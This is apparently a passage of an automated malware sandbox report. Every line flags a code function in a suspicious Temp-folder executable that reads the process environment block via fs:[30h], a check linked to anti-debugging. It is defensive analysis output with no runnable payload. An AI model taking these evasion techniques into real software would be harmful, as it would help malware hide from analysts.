Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h] 3_2_00A690AF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h] 3_2_00A29080
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h] 3_2_00AA3884
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h] 3_2_00AA3884
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h] 3_2_00A258EC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h] 3_2_00AF4015
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h] 3_2_00AF4015
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h] 3_2_00AF1074
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h] 3_2_00AE2073
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h] 3_2_00A40050
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h] 3_2_00A40050
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h] 3_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h] 3_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h] 3_2_00AA69A6
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h] 3_2_00A5A185
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h] 3_2_00A4C182
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h] 3_2_00A52990
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h] 3_2_00AB41E8
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h] 3_2_00A5513A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h] 3_2_00A5513A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h] 3_2_00A2C962
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h] 3_2_00A2B171
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h] 3_2_00A2B171
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h] 3_2_00A4B944
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h] 3_2_00A4B944
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A3AAB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A3AAB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A5FAB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h] 3_2_00A5D294
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h] 3_2_00A5D294
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A52AE4
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h] 3_2_00A52ACB
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h] 3_2_00A64A2C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h] 3_2_00A64A2C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h] 3_2_00A38A0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A2AA16
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A2AA16
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h] 3_2_00A43A1C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h] 3_2_00ADB260
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h] 3_2_00ADB260
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AF8A62
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h] 3_2_00A6927A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h] 3_2_00AEEA55
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h] 3_2_00AB4257
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF5BA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h] 3_2_00AE138A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h] 3_2_00A31B8F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h] 3_2_00A31B8F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h] 3_2_00ADD380
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h] 3_2_00A52397
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h] 3_2_00A5B390
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A4DBE9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h] 3_2_00AA53CA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h] 3_2_00AA53CA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h] 3_2_00AE131B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00A2DB60
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h] 3_2_00A53B7A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h] 3_2_00A53B7A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h] 3_2_00A2DB40
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AF8B58
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h] 3_2_00A2F358
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h] 3_2_00A3849B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h] 3_2_00AE14FB
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AF8CD6
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A5BC2C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h] 3_2_00A4746D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h] 3_2_00A5A44B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h] 3_2_00ABC450
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h] 3_2_00ABC450
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h] 3_2_00AF05AC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h] 3_2_00AF05AC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h] 3_2_00A535A1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A5FD9B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A5FD9B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AD8DF1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h] 3_2_00A2AD30
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
